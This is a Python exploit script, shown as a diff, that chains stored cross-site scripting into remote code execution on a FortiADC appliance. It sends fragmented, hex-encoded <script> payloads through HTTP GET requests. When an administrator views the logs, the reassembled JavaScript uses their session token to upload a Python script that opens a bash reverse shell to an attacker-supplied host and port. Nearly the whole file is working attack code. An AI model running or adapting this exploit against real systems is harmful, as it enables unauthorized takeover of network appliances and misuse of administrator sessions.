| 1 | + | #!/usr/bin/python3 |
| 2 | + | |
| 3 | + | import math |
| 4 | + | import time |
| 5 | + | import socket |
| 6 | + | import base64 |
| 7 | + | import argparse |
| 8 | + | |
| 9 | + | |
| 10 | + | |
| 11 | + | def encode_all(string): |
| 12 | + | return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) |
| 13 | + | |
| 14 | + | def genPayload(host, port): |
| 15 | + | data = '-----------------------------7020473452044903480265093380%0D%0AContent-Disposition: form-data; name="pyfile";filename="test.txt"%0D%0AContent-Type: text/plain%0D%0Aimport os; os.system("bash -i >& /dev/tcp/' + host + '/' + port + '0>&1")%0D%0A-----------------------------7020473452044903480265093380--' |
| 16 | + | |
| 17 | + | script_url = '/ui/#navigate/Config/system/aws_scripting' |
| 18 | + | payload='''var xhr = new XMLHttpRequest(); |
| 19 | + | xhr.open("POST","/ui/#navigate/Config/system/aws_scripting",true); |
| 20 | + | xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]); |
| 21 | + | xhr.setRequestHeader("Content-Type","multipart/form-data;boundary=---------------------------7020473452044903480265093380"); |
| 22 | + | xhr.send('%s');xhr.open("GET","/api/system_aws_scripting/py_script_log?vdom=root&traffic_group=default",true);xhr.setRequestHeader("Authorization","Bearer " + sessionStorage["jwtoken"]);xhr.send();''' % data |
| 23 | + | |
| 24 | + | payload=encode_all(payload) |
| 25 | + | |
| 26 | + | chunks = [payload[i:i+400] for i in range(0, len(payload), 400)] |
| 27 | + | |
| 28 | + | # We need to store chunks in a variable reading each row and then decode and eval it |
| 29 | + | payload=["p='';for(s=1;s<%s;s++);p+=$('table').dataTable().api().data()[s]['http_qry'];f=eval(decodeURIComponent(p))" % (len(chunks)+1)] |
| 30 | + | for i in chunks: |
| 31 | + | payload.append("%s" % i) |
| 32 | + | return payload |
| 33 | + | |
| 34 | + | uri=['','','','','','','','','',''] |
| 35 | + | |
| 36 | + | uri+=['<script>e(e(s))', \ |
| 37 | + | '<script>s=e(v)', \ |
| 38 | + | '<script>u=$(d)', \ |
| 39 | + | '<script>v+=d+c', \ |
| 40 | + | '<script>c="()"', \ |
| 41 | + | '<script>v="u.t"', \ |
| 42 | + | '<script>d="ext"', \ |
| 43 | + | '<ext>y"]', \ |
| 44 | + | '<ext>]["http_qr', \ |
| 45 | + | '<ext>t.data()[0'] |
| 46 | + | |
| 47 | + | uri+=['<script>e(e(y))', \ |
| 48 | + | '<script>e(e(z))', \ |
| 49 | + | '<script>w=$(d)', \ |
| 50 | + | '<script>z+=d+c', \ |
| 51 | + | '<script>c="()"', \ |
| 52 | + | '<script>z="w.t"', \ |
| 53 | + | '<script>d="ext"', \ |
| 54 | + | '<ext>le().api()', \ |
| 55 | + | '<ext>").dataTab', \ |
| 56 | + | '<ext>t=$("table'] |
| 57 | + | |
| 58 | + | uri+=['<script>e(e(y))', \ |
| 59 | + | '<script>e=eval', \ |
| 60 | + | '<script>x=$(d)', \ |
| 61 | + | '<script>y+=d+c', \ |
| 62 | + | '<script>c="()"', \ |
| 63 | + | '<script>y="x.t"', \ |
| 64 | + | '<script>d="ext"', \ |
| 65 | + | '<ext>).click())', \ |
| 66 | + | '<ext>>$(".next"', \ |
| 67 | + | '<ext>_.delay(_='] |
| 68 | + | |
| 69 | + | parser = argparse.ArgumentParser(description='FortiADC XSS to RCE') |
| 70 | + | parser.add_argument('thost', metavar='thost', help='Target host') |
| 71 | + | parser.add_argument('tport', metavar='tport', help='Target port') |
| 72 | + | parser.add_argument('rhost', metavar='rhost', help='Reverse shell host') |
| 73 | + | parser.add_argument('rport', metavar='rport', help='Reverse shell port') |
| 74 | + | args = parser.parse_args() |
| 75 | + | count=0 |
| 76 | + | payload = genPayload(args.rhost, args.rport) |
| 77 | + | temp = len(payload)-1 |
| 78 | + | |
| 79 | + | for i in uri: |
| 80 | + | if (count>=13) and (temp>=0): |
| 81 | + | data = "GET %s?%s\r\n\r\n" % (i,payload[temp]) |
| 82 | + | temp-=1 |
| 83 | + | time.sleep(0.1) |
| 84 | + | else: |
| 85 | + | data = "GET %s?%s\r\n\r\n" % (i,count) |
| 86 | + | time.sleep(0.1) |
| 87 | + | |
| 88 | + | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 89 | + | s.connect((args.thost, int(args.tport))) |
| 90 | + | s.send(str.encode(data)) |
| 91 | + | s.close() |
| 92 | + | count+=1 |
| 93 | + | |